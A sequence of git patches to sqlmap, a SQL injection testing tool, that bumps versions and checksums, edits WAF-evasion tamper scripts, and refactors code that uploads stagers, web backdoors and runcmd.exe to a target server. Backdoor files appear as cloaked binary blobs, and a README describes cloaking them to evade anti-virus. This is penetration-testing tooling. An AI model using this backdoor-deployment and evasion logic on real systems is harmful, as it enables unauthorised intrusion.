tamper/appendnullbyte.py +0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py 55e9fbe57967e57a05a8ca77c312dc70 tamper/between.py -f942ad818d3e26ec34f0d15ca8b84207 tamper/bluecoat.py +e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py e3cdf13caedb4682bee3ff8fac103606 tamper/chardoubleencode.py 3b2f68476fbcf8223199e8dd4ec14b64 tamper/charencode.py b502023ac6c48e49e652ba524b8e18cc tamper/charunicodeencode.py -8bc697b143bba852b459806fcfaa5422 tamper/charunicodeescape.py -9e9719d822afab818d6a8a42351baa40 tamper/commalesslimit.py -7f0110c706aca9cd090c0371e6d1a4cb tamper/commalessmid.py -8070799415795bd6f23d11d02b99fbe9 tamper/commentbeforeparentheses.py -6498568524665729cb04a41c5f67f975 tamper/concat2concatws.py +2c2b38974dc773568de7e7d771d7042c tamper/charunicodeescape.py +763aa317d43909a51dd4c2f36834718d tamper/commalesslimit.py +211bb8fa36a6ecb42b719c951c362851 tamper/commalessmid.py +19acfde79c9a2d8458e15182f5b73d71 tamper/commentbeforeparentheses.py +61f895acaaf3dea78e237bdf5fe30a81 tamper/concat2concatws.py dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py -0a61e7b57ad593202b8449601e757f16 tamper/escapequotes.py +06df880df5d8749963f5562f60fd1637 tamper/escapequotes.py 4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py 25ec62158d3e289bda8a04c8b65686ba tamper/halfversionedmorekeywords.py 9d8c350cbb90d4b21ec9c9db184a213a tamper/htmlencode.py 838212f289632526777b7224bf8aacf9 tamper/ifnull2casewhenisnull.py e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py -2416ff8e020fc2db29a580f55dcb6fb1 tamper/informationschemacomment.py +91c92ee203e7e619cb547643883924ca tamper/informationschemacomment.py 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py 2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py -22a740e6fbcb8cc3ada430e3fb1be05f tamper/lowercase.py -e44163d21e055805b5e55667e72f5978 tamper/modsecurityversioned.py -f83a11d594fad3ed3291074c7b37b281 tamper/modsecurityzeroversioned.py -abd6490408551a8c8226a32fbc2b5345 tamper/multiplespaces.py +1834b5409c449d2ea1b70a5038fed9eb tamper/lowercase.py +b7e892fc185927c7eb4a604f87b8b6c1 tamper/modsecurityversioned.py +a15ae5a795661fe992bb476346d54794 tamper/modsecurityzeroversioned.py +b4cadf2ddcdc0598c9a3bf24521a2fa1 tamper/multiplespaces.py be757e4c9a6fb36af7b9a8c444fddb05 tamper/nonrecursivereplacement.py e298e486c06bb39d81f10d61a5c4ceec tamper/overlongutf8more.py b9f698556f8333d9fa6eadaab44a77ab tamper/overlongutf8.py bc0363e4fc04240c9f7b81e4ecce0714 tamper/percentage.py -4fa8b6c0e7573e395330bb6a405abbaf tamper/plus2concat.py -5b947c6cd78eab22ee53f5f534c532d3 tamper/plus2fnconcat.py -44fd1c13a7dd6ae792f11afb28976480 tamper/randomcase.py +b30240804cce482b6ab77714508de89c tamper/plus2concat.py +a8f4a85be6e98b53060b066cd18eed15 tamper/plus2fnconcat.py +e94a1c7e4dc7450ac224436269d823bb tamper/randomcase.py 6368a971a80b1acbbbc6b76616bd96b9 tamper/randomcomments.py 48228322d40d97016b05e408c5234634 tamper/securesphere.py cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py From e347d90ec56eacfd67ad5302f7c5cc08e2c527d0 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 8 Feb 2018 16:53:46 +0100 Subject: [PATCH 029/428] Minor patch --- lib/core/settings.py | 2 +- shell/README.txt | 4 ++-- txt/checksum.md5 | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d86411f46a1..2e9adf106b4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.6" +VERSION = "1.2.2.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/shell/README.txt b/shell/README.txt index 6e7f123fec7..77b1c57ee9f 100644 --- a/shell/README.txt +++ b/shell/README.txt @@ -1,7 +1,7 @@ Due to the anti-virus positive detection of shell scripts stored inside this folder, we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing has to be done prior to their usage by sqlmap, but if you want to have access to their original source code use the decrypt functionality of the ../extra/cloak/cloak.py utility. To prepare the original scripts to the cloaked form use this command: -find backdoor.* stager.* -type f -exec python ../extra/cloak/cloak.py -i '{}' \; +find backdoors/backdoor.* stagers/stager.* -type f -exec python ../extra/cloak/cloak.py -i '{}' \; To get back them into the original form use this: -find backdoor.*_ stager.*_ -type f -exec python ../extra/cloak/cloak.py -d -i '{}' \; +find backdoors/backdoor.*_ stagers/stager.*_ -type f -exec python ../extra/cloak/cloak.py -d -i '{}' \; diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0ba29947853..695778a1c86 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -99f9e29606ab1c3f48c822c77d1dc18b lib/core/settings.py +77b3fc93b10a517a0dde172b13f480c9 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From d813d24c4801bb2c4904a7f5407581700cb06dc9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 8 Feb 2018 16:58:50 +0100 Subject: [PATCH 030/428] Minor update --- lib/core/settings.py | 2 +- shell/backdoors/backdoor.jsp_ | Bin 360 -> 359 bytes txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 2e9adf106b4..741fe3c2766 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.7" +VERSION = "1.2.2.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/shell/backdoors/backdoor.jsp_ b/shell/backdoors/backdoor.jsp_ index ef32603bbe9e1f311d0bb202715362cfd9815318..d482c48cc43458d0cb3ca7e4fe68660df4625460 100644 GIT binary patch literal 359 zcmV-t0hs;=oRyL?G<;5PhVS`m9H5XlyNl-mUxIi(u(Wt^;vU_d5?s4BGqSd&^uI*e z5foC2nk-H8&P)(lX7#SY8FYIpB;&%EzZvf)qB9N2p-3L1VH_+N4fJ8`kj;ZE1%AG8 z1|syq_#EiznNLxxR>D_!91r-`pm523!%G=YplqBCBXODWq?ix`z`ANj9MOf1;Ko>* zv@XLdc7o0|Xt)7adH|%ICI(R+eS=hXBzfK1w^^jdY6C^u#tC+=k@tb8Mi3J3h7-rI z^7xnf^g8L(P#pc>w4Rw+Tb2tx@R15fMrDqdzh5sbDtL#Mz_U4cDjd8Mw`xsA%f-G( zl{o1#ESBi7m>wyhd|--15}VLQ`Uu_=>Q0l z5w$5g%@)YK^UOq(j0Kk;@_K?3jJ5&HpYzv4l|@45(3`L>kFlxMdPR5{$mZTPwSU)# zqE`E$-H=X-A9HCSB@00!pr7VR5YVG)oDD->jR{+s5S+(ZRjf%D{W%ZqEjr>?>fmsX z8;EzrmTGq`H!9-#u5J9DUA+xMfp&9IZP-od&c1@0S0llA7i43kxH;Z6)7_fTeoZ(URJA46I)22^T|o1E@iocBW3HPCHeSqb0r9n;?j-B3iq3DlDa%W-fxK>cz! GL+>Z9ZnBX8 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 695778a1c86..d34a87d3682 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -77b3fc93b10a517a0dde172b13f480c9 lib/core/settings.py +a333cf1cf7e533c13bf1aec774c82938 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -217,7 +217,7 @@ e522c294676ede15bee751107e9bb449 plugins/generic/takeover.py 1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py b04db3e861edde1f9dd0a3850d5b96c8 shell/backdoors/backdoor.asp_ 158bfa168128393dde8d6ed11fe9a1b8 shell/backdoors/backdoor.aspx_ -1add5a9a67539e7fd1999c8c20a69d15 shell/backdoors/backdoor.jsp_ +595f711adf1ecb5f3b9a64532b04d8b9 shell/backdoors/backdoor.jsp_ 09fc3ed6543f4d1885e338b271e5e97a shell/backdoors/backdoor.php_ 0e7aba05423c272f051f31165b0e416d shell/stagers/stager.asp_ c3cc8b7727161e64ab59f312c33b541a shell/stagers/stager.aspx_ From faaae2b647eb99498845ef9e26e52154495d4549 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 8 Feb 2018 17:08:44 +0100 Subject: [PATCH 031/428] Minor refactoring --- lib/core/settings.py | 6 +++++- lib/takeover/web.py | 8 +++++--- shell/backdoors/backdoor.asp_ | Bin 240 -> 243 bytes shell/stagers/stager.asp_ | Bin 1199 -> 1201 bytes shell/stagers/stager.aspx_ | Bin 527 -> 529 bytes shell/stagers/stager.jsp_ | Bin 1320 -> 1321 bytes shell/stagers/stager.php_ | Bin 377 -> 379 bytes txt/checksum.md5 | 14 +++++++------- 8 files changed, 17 insertions(+), 11 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 741fe3c2766..118286cc652 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.8" +VERSION = "1.2.2.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -299,6 +299,10 @@ "wizard", ) +# Tags used for value replacements inside shell scripts +SHELL_WRITABLE_DIR_TAG = "%WRITABLE_DIR%" +SHELL_RUNCMD_EXE_TAG = "%RUNCMD_EXE%" + # String representation for NULL value NULL = "NULL" diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 2952a127f0b..2395b06b22b 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -47,6 +47,8 @@ from lib.core.exception import SqlmapNoneDataException from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT from lib.core.settings import EVENTVALIDATION_REGEX +from lib.core.settings import SHELL_RUNCMD_EXE_TAG +from lib.core.settings import SHELL_WRITABLE_DIR_TAG from lib.core.settings import VIEWSTATE_REGEX from lib.request.connect import Connect as Request from thirdparty.oset.pyoset import oset @@ -134,7 +136,7 @@ def _webFileStreamUpload(self, stream, destFileName, directory): def _webFileInject(self, fileContent, fileName, directory): outFile = posixpath.join(ntToPosixSlashes(directory), fileName) - uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) + uplQuery = getUnicode(fileContent).replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) query = "" if isTechniqueAvailable(kb.technique): @@ -324,7 +326,7 @@ def webInit(self): with open(filename, "w+b") as f: _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webApi)) - _ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)) + _ = _.replace(SHELL_WRITABLE_DIR_TAG, utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)) f.write(_) self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True) @@ -369,7 +371,7 @@ def webInit(self): continue _ = "tmpe%s.exe" % randomStr(lowercase=True) - if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)): + if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace(SHELL_WRITABLE_DIR_TAG, backdoorDirectory).replace(SHELL_RUNCMD_EXE_TAG, _)): self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_")) self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = backdoorDirectory diff --git a/shell/backdoors/backdoor.asp_ b/shell/backdoors/backdoor.asp_ index d126faee7dc5a9a89bf0bedd9fd38fc780106cb0..9f9a20586cb42b43b9922e9cec98653d51e8445e 100644 GIT binary patch literal 243 zcmVJoQ00dF~d)9I`{sHkyaO7CB^hRo09;0%qzxvN zR08wGB1%%4_whjLs1mw3L3mFo_%*OCUD!hM1iZr)4gqpQ7$`@Z$I t5{c{;F9gDEJ;WbQZtU~=1M3iejpNV=T=LRMapyrmc@AlN3ykH$+V<3lOIHP{$ZPj z*L|_`2ku4;20Ked=n5K|!NGbLOHdal6%XeR{RhO#%@(OFTJLqH5IdI9_*jzTzbjFS z4XqJCx$CAn{TctF&f2C#uvX~s3*H8PsWG*9azT$50@#n?w_x2*hGCR#xrYWf@x(Ar zYcSYufUm?Wn~5l_zz8d{xV*~530BpEy3f-dzO%?R(?^`T17!GJcgRG45eE4HQh3|| diff --git a/shell/stagers/stager.asp_ b/shell/stagers/stager.asp_ index 75a64c1fc4158402453f7ba8b05da736f4c397a4..7918d6ac7aa9aa2dceb74c6b9727606327146241 100644 GIT binary patch literal 1201 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 literal 1320 zcmV+@1=soqoRult5!*R$0_P}P-K3fRq4d(143G}H|-qdQFvR8u(PWFpUPy?uvydU^(t(b6jkE#{y z0E%IvuxVCs06JzVij*orb6MW#)d)Y5kP(W!Yb8z1!{Z^Nqu#e3#macjI|uB;tBHrY zI3X^_Lo(nYloqyvYHZWI&S@^WbgqO~?v=t~`y;b8KdGL*d3UhYjydt4OSjH)m(Q0K_8gPCFkcQzfwSmlwmTpsPz^ z*H##TlycWD3X_-YlCyHldx{H{ILGTHB|ocyCFoVnj1q+@Ook$*hltngZ`j~Z05 zIl9|%z6b3{^&m|ymzlLe^u7oCX82rTRbsP2TBv6&v)~rSOD~FM-5t!$mc>rAU5aTa z#HAUDAx-ohsnL{-YFc>}lb&Ub(G;5z(+mlU{GccQGusK2%oHcGf;e_`Me_!y*JcZI zbBWqDwNG&TmT&!^z}fRrWh*TyRO`r$Yhr@xd10{$2>bS@tNYoXmlx=p*QfYo%JrLz zK=kU_>2G;_1Hf`5I#1np=Iz(D+ch)akj)+F1~&>^sU?6mJ;#Eqrj;x*Nu7~-Kh%sU z6EMr~_x)^0!66Tp*IiR@xOe=~B@_4?w9LzL$h4UIeO}K3*iW&}X!s)J@|zlVl~+*{ z6;aY%RmFhR`inO^3;<1vSk)N5iFL_O)OydU4LE~mx5~*^&59*}Nj|xbNwvqN`~_VN zAjg}OW6K4@g}2fjqZ)fzT#0;OO=-Uh+{DBRjyR;-GnM`_sgkicpyeN*6Vs0?9{EE5 z)TdpiBR7Wnz~7arz>bQeKA83&FO~XQlrwr-}YyiQZq) z$5ic~oNp`FvPNESF%nm>(*?Pt8MV$K%2}l2%kX%#D-}Q5URX0%mLd7IFwAA(Dc`N6de*i{QuGJIs;!N z=X@n#;4W`_G`3cQm1z(Z;afyWHfPH+@H@FIsAEcuiT>z(t1Id=e za0V^NORq()Mt5{3zaLj2EVrCc1IxL89(!s8fa99Tu)4jU$-q z>x=DeJWvsoQa3_SHv)aY+jasi%1|k#d eY+&}o3`{c46->@(5P%IN1U)XiKK*nc;xPJ@u#(UK diff --git a/shell/stagers/stager.php_ b/shell/stagers/stager.php_ index 64f8eacabdfe758595297d199003ff5c069690f2..54c8930a26d54df1f70408548752b0f64b8ddf5e 100644 GIT binary patch literal 379 zcmV->0fhbsoSl;I6oNlv#^3iSV>ppLvx3DRsny6=7p$rK!8^pfbZ|q@ofuOc|NAk` zE{wg{1LFqI0-oo&Q0kLY&LtaoYm(Pd8A~n4M~Y^E zbh&<-S0~qe$0gGUj4W?CJ#o*F58x;Evl;{sv)st_1%3i@eTq8FkS=k1;7e_Xb7ZtP zd&xaf`lZEcbvhU7Tg`QTRYF;J;cJxrjr-XY3b()}y(S-ES$au^gXT{4t(m`AOU%IT ztX0?hBv$dpwGFCqEB@uGl6sS);74tYU=hIvdVxSO*!N%zb?>~`R0s)JWX&iE$Go8O Z9W=>$2!iTxEU!@$%04m7)@Z_R>iXz6y($0z literal 377 zcmV-<0fznuoSl*)6v9tuh41}pUU#Tzi)1|318~*|} zt2}1A*ag!|SkFdSP_;QaCA7$C7o=0M(AtsjK|#4bxPmH?v1h@xu3*}T5BrBpT4Sy< z#Wjy&=2{-PrX-yd93S*VlG>7U+wBHt1(Ek}gwYeR3xjGa+Yh~h1~cW`V=T7AE*yz2 zq$}+RH_%-bz^)Y`z)7u5 zK8l!&p0c<-v4~=eazMs6-2#bQnn{){dDINsSKthhS4$Ak8#(LPE zD&;8 Date: Sat, 10 Feb 2018 11:06:31 +0100 Subject: [PATCH 032/428] Fixes #2923 --- lib/core/settings.py | 2 +- tamper/appendnullbyte.py | 2 ++ tamper/commalesslimit.py | 1 + tamper/concat2concatws.py | 2 ++ tamper/modsecurityversioned.py | 2 ++ tamper/modsecurityzeroversioned.py | 2 ++ tamper/plus2concat.py | 1 + tamper/plus2fnconcat.py | 1 + txt/checksum.md5 | 16 ++++++++-------- 9 files changed, 20 insertions(+), 9 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 118286cc652..05ed12b9549 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.9" +VERSION = "1.2.2.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py index 3ea3d30b85a..d1c11069728 100644 --- a/tamper/appendnullbyte.py +++ b/tamper/appendnullbyte.py @@ -5,6 +5,8 @@ See the file 'LICENSE' for copying permission """ +import os + from lib.core.common import singleTimeWarnMessage from lib.core.enums import DBMS from lib.core.enums import PRIORITY diff --git a/tamper/commalesslimit.py b/tamper/commalesslimit.py index 28f8f56af7d..4b62246de1b 100644 --- a/tamper/commalesslimit.py +++ b/tamper/commalesslimit.py @@ -5,6 +5,7 @@ See the file 'LICENSE' for copying permission """ +import os import re from lib.core.common import singleTimeWarnMessage diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py index f21dc7346d2..58ff490e987 100644 --- a/tamper/concat2concatws.py +++ b/tamper/concat2concatws.py @@ -5,6 +5,8 @@ See the file 'LICENSE' for copying permission """ +import os + from lib.core.common import singleTimeWarnMessage from lib.core.enums import DBMS from lib.core.enums import PRIORITY diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py index 224cd59f1ae..e287d25a2c8 100644 --- a/tamper/modsecurityversioned.py +++ b/tamper/modsecurityversioned.py @@ -5,6 +5,8 @@ See the file 'LICENSE' for copying permission """ +import os + from lib.core.common import randomInt from lib.core.common import singleTimeWarnMessage from lib.core.enums import DBMS diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py index 34ba6a0a5a4..a3d24a55446 100644 --- a/tamper/modsecurityzeroversioned.py +++ b/tamper/modsecurityzeroversioned.py @@ -5,6 +5,8 @@ See the file 'LICENSE' for copying permission """ +import os + from lib.core.common import singleTimeWarnMessage from lib.core.enums import DBMS from lib.core.enums import PRIORITY diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py index f26439dd1a7..5945797c045 100644 --- a/tamper/plus2concat.py +++ b/tamper/plus2concat.py @@ -5,6 +5,7 @@ See the file 'LICENSE' for copying permission """ +import os import re from lib.core.common import singleTimeWarnMessage diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py index 47572d2ccd5..27cbbea207f 100644 --- a/tamper/plus2fnconcat.py +++ b/tamper/plus2fnconcat.py @@ -5,6 +5,7 @@ See the file 'LICENSE' for copying permission """ +import os import re from lib.core.common import singleTimeWarnMessage diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 94ff4745e1f..8c0dd8ba81f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d4f192e51b660e59391dee667f79c652 lib/core/settings.py +659fe726d16a8b4557d96d82181ace88 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -227,7 +227,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 3e2e790c370442c3d98eaa88a3523b15 sqlmap.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py -5be6e24825d34437512b9021f35ee026 tamper/appendnullbyte.py +d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py 0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py 55e9fbe57967e57a05a8ca77c312dc70 tamper/between.py e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py @@ -235,10 +235,10 @@ e3cdf13caedb4682bee3ff8fac103606 tamper/chardoubleencode.py 3b2f68476fbcf8223199e8dd4ec14b64 tamper/charencode.py b502023ac6c48e49e652ba524b8e18cc tamper/charunicodeencode.py 2c2b38974dc773568de7e7d771d7042c tamper/charunicodeescape.py 